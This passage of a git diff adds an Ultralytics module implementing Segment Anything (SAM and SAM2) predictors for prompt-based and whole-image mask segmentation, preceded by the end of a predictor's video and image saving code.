in {"stream", "video"}: + fps = self.dataset.fps if self.dataset.mode == "video" else 30 + frames_path = f'{save_path.split(".", 1)[0]}_frames/' + if save_path not in self.vid_writer: # new video + if self.args.save_frames: + Path(frames_path).mkdir(parents=True, exist_ok=True) + suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG") + self.vid_writer[save_path] = cv2.VideoWriter( + filename=str(Path(save_path).with_suffix(suffix)), + fourcc=cv2.VideoWriter_fourcc(*fourcc), + fps=fps, # integer required, floats produce error in MP4 codec + frameSize=(im.shape[1], im.shape[0]), # (width, height) + ) + + # Save video + self.vid_writer[save_path].write(im) + if self.args.save_frames: + cv2.imwrite(f"{frames_path}{frame}.jpg", im) + + # Save images + else: + cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im) # save to JPG for best support + + def show(self, p=""): + """Display an image in a window using the OpenCV imshow function.""" + im = self.plotted_img + if platform.system() == "Linux" and p not in self.windows: + self.windows.append(p) + cv2.namedWindow(p, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux) + cv2.resizeWindow(p, im.shape[1], im.shape[0]) # (width, height) + cv2.imshow(p, im) + cv2.waitKey(300 if self.dataset.mode == "image" else 1) # 1 millisecond + + def run_callbacks(self, event: str): + """Runs all registered callbacks for a specific event.""" + for callback in self.callbacks.get(event, []): + callback(self) + + def add_callback(self, event: str, func): + """Add callback.""" + self.callbacks[event].append(func) diff --git a/2024.ultralytics/v8.3.46/models/sam/predict.py b/2024.ultralytics/v8.3.46/models/sam/predict.py new file mode 100644 index 0000000..b657ef7 --- /dev/null +++ b/2024.ultralytics/v8.3.46/models/sam/predict.py @@ -0,0 +1,1606 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Generate predictions using the Segment Anything Model (SAM). + +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. + std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im (torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. + + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (np.ndarray): The output masks in shape (C, H, W), where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + (np.ndarray): Low-resolution logits of shape (C, H, W) for subsequent inference, where H=W=256. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, logits = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. + crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. + pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. + + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. + + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. + prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM2 Paper: [Add link to SAM2 paper when available] + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. + + This class extends the functionality of SAM2Predictor to support video processing and maintains + the state of inference operations. It includes configurations for managing non-overlapping masks, + clearing memory for non-conditional inputs, and setting up callbacks for prediction events. + + Attributes: + inference_state (Dict): A dictionary to store the current state of inference operations. + non_overlap_masks (bool): A flag indicating whether masks should be non-overlapping. + clear_non_cond_mem_around_input (bool): A flag to control clearing non-conditional memory around inputs. + 